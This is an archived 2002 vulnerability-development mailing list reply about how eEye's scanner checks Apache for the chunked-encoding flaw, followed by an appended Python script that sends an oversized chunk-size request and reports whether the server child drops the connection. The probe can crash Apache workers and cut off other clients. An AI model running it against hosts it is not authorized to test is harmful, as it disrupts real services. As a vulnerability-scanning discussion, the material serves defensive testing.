Vulnerability Development mailing list archives

Re: Apache vulnerability checking


From: "Laurentiu Nicula" <lnicula () eeye com>
Date: Wed, 26 Jun 2002 15:16:37 -0700

Bram Matthys said:

I didn't know eEye's tool only checked the version, pretty strange since
it's easy to make something like I did. Of course in case someone is using
apache 2.x + multiple connections per child or something = some other
clients will be killed too... maybe they didn't want to take that risk.


Initially the tool checked only the version, and at some point it even had an
internal list of vendor-version pairs that were tagged as "Might not be
vulnerable".

We had to choose between a big number of false positives due to various bug
backports and fake banners and the risk of, like you said, killing some
connections.

So, to make the tool useful, the current version disregards the Server banner
completely and does a chunked encoding request to the server.

Signed,
Laurentiu Nicula
Software Engineer
eEye Digital Security
T.949.349.9062
F.949.349.9538

http://eEye.com/Retina - Network Security Scanner
http://eEye.com/Iris/ - Network Traffic Analyzer
http://eEye.com/SecureIIS - Web Application Firewall
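
The trade-off described in the message above (banner check versus a live chunked-encoding request) in working code, as an added example that is not eEye's Retina code and not taken from the thread. The post says only that a "chunked encoding request" is sent and gives no request bytes, so the oversized chunk-size value used as the probe, the filler body and the verdict names are assumptions made here. The banner is still parsed, but only for the report: backported fixes and fake banners are exactly why it cannot decide the verdict. Like any behavioural check, the probe can kill the worker handling the request (and, as Bram notes, other clients' connections on a child serving several of them), so it belongs only on hosts you are authorized to test.

```python
#!/usr/bin/env python3
"""Banner-independent check for the Apache chunked-encoding flaw discussed in
this thread.  Added example, not eEye's Retina code.  The probe chunk-size
value and the verdict names are assumptions made here."""
import socket
import sys
from typing import Optional

# Assumption: an oversized chunk-size line is used as the probe.  The post only
# says a "chunked encoding request" is sent; it does not give the exact bytes.
PROBE_CHUNK_SIZE_HEX = "FFFFFFF0"


def parse_server_banner(response: bytes) -> str:
    """Return the Server: header value, or '' if absent.

    Kept for reporting only: banners can be faked, and distributions backport
    fixes without bumping the version, so the banner never decides the verdict.
    """
    head = response.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(b":")
        if name.strip().lower() == b"server":
            return value.strip().decode("latin-1", "replace")
    return ""


def build_chunked_probe(host: str, path: str = "/",
                        chunk_size_hex: str = PROBE_CHUNK_SIZE_HEX) -> bytes:
    """Build a POST whose body uses Transfer-Encoding: chunked and starts with
    an oversized chunk-size line followed by a little filler data.

    A server that parses chunk sizes correctly answers with an HTTP status line
    (often a 4xx); a child that mishandles the size may die, and the connection
    is then dropped without any response.
    """
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Transfer-Encoding: chunked\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    body = f"{chunk_size_hex}\r\n" + "A" * 64 + "\r\n"   # constructed filler data
    return (head + body).encode("ascii")


def classify_response(data: bytes, error: Optional[OSError]) -> str:
    """Turn what came back from the probe into a verdict."""
    if data.startswith(b"HTTP/"):
        return "responded"            # request was parsed (or rejected) normally
    if error is not None or not data:
        return "connection-dropped"   # no status line at all: suspect a crashed child
    return "unexpected"               # non-HTTP bytes; report for manual review


def probe(host: str, port: int = 80, path: str = "/", timeout: float = 5.0) -> dict:
    """Live network probe: sends the request and reports banner plus verdict.
    Can kill the worker that handles it, so use only on hosts you own."""
    data, err, timed_out = b"", None, False
    sock = socket.create_connection((host, port), timeout=timeout)
    try:
        sock.sendall(build_chunked_probe(host, path))
        while len(data) < 65536:
            piece = sock.recv(4096)
            if not piece:
                break
            data += piece
    except socket.timeout:
        timed_out = True
    except OSError as exc:
        err = exc
    finally:
        sock.close()
    if timed_out and not data:
        verdict = "inconclusive-timeout"  # neither answered nor dropped: say nothing
    else:
        verdict = classify_response(data, err)
    return {"banner": parse_server_banner(data), "verdict": verdict}


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else "localhost"
    print(probe(target))
```

The verdict deliberately has three outcomes rather than two: a timeout with no bytes received is reported as inconclusive instead of being folded into "dropped", since a slow or filtered host would otherwise show up as a false positive, the very problem the banner approach had in the other direction.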




